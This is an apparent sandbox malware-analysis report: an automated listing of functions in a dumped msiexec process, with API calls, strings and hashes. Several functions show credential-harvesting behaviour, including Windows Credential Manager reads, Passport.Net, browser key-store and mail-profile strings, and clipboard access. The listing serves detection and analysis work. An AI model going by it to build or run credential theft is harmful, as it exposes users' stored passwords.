                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                • String ID: global-salt$password-check
                                                                                                                                                • API String ID: 231171946-3927197501
                                                                                                                                                • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                                                • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                                                Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                                                                                • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                                                • Opcode Fuzzy Hash: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                                                                                • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                                                Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                                                • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                                                • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                                                • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                                                • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                                                • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 19018683-0
                                                                                                                                                • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                                                • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                                                Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040644F
                                                                                                                                                • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                                                  • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                  • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                                                • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                                                • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                                                • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                                                  • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 438689982-0
                                                                                                                                                • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                                                                • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                                                                Function 0040F6E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                                                • strlen.MSVCRT ref: 0040F7BE
                                                                                                                                                • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                • String ID: Passport.Net\*
                                                                                                                                                • API String ID: 2329438634-3671122194
                                                                                                                                                • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                                                                • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                                                                • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                                                                • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                                                                Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                                                • memset.MSVCRT ref: 0040330B
                                                                                                                                                • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                                                • strchr.MSVCRT ref: 0040335A
                                                                                                                                                  • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                                                • strlen.MSVCRT ref: 0040339C
                                                                                                                                                  • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                • String ID: Personalities
                                                                                                                                                • API String ID: 2103853322-4287407858
                                                                                                                                                • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                                                                • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                                                                • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                                                                • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                                                                Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset
                                                                                                                                                • String ID: H
                                                                                                                                                • API String ID: 2221118986-2852464175
                                                                                                                                                • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                                                • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                                                Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                • API String ID: 3510742995-3170954634
                                                                                                                                                • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                                                                • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                                                                Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                • String ID: winWrite1$winWrite2
                                                                                                                                                • API String ID: 438689982-3457389245
                                                                                                                                                • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                                                • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                                                Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                • String ID: winRead
                                                                                                                                                • API String ID: 1297977491-2759563040
                                                                                                                                                • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                                                • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                                                Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0044955B
                                                                                                                                                • memset.MSVCRT ref: 0044956B
                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                • String ID: gj
                                                                                                                                                • API String ID: 1297977491-4203073231
                                                                                                                                                • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                                                • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                                                Function 0040C143 Relevance: 7.6, APIs: 5, Instructions: 54clipboardCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                                                • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                                                • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                                                • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1189762176-0
                                                                                                                                                • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                                                • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                                                Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetParent.USER32(?), ref: 004090C2
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4247780290-0
                                                                                                                                                • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                                                • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                                                Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                                                  • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                                                  • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                                                • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                                                • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2775283111-0
                                                                                                                                                • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                                                                • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                                                                Function 0041479C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                                                • API String ID: 885266447-2471937615
                                                                                                                                                • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                                                                • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                                                                                • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                                                                • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                                                                                Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                                                • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strcmpi$_mbscpy
                                                                                                                                                • String ID: smtp
                                                                                                                                                • API String ID: 2625860049-60245459
                                                                                                                                                • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                                                                • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                                                                • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                                                                • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                                                                Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040C28C
                                                                                                                                                • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                                                                  • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FocusMessagePostmemset
                                                                                                                                                • String ID: S_@$l
                                                                                                                                                • API String ID: 3436799508-4018740455
                                                                                                                                                • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                                                                • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                                                                • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                                                                • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                                                                Function 0040929C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004092C0
                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                Strings
                                                                                                                                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileString_mbscpymemset
                                                                                                                                                • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                                                                                • API String ID: 408644273-3424043681
                                                                                                                                                • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                                                                • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                                                                                • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                                                                • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                                                                                Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscpy
                                                                                                                                                • String ID: C^@$X$ini
                                                                                                                                                • API String ID: 714388716-917056472
                                                                                                                                                • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                                                                • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                                                                Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
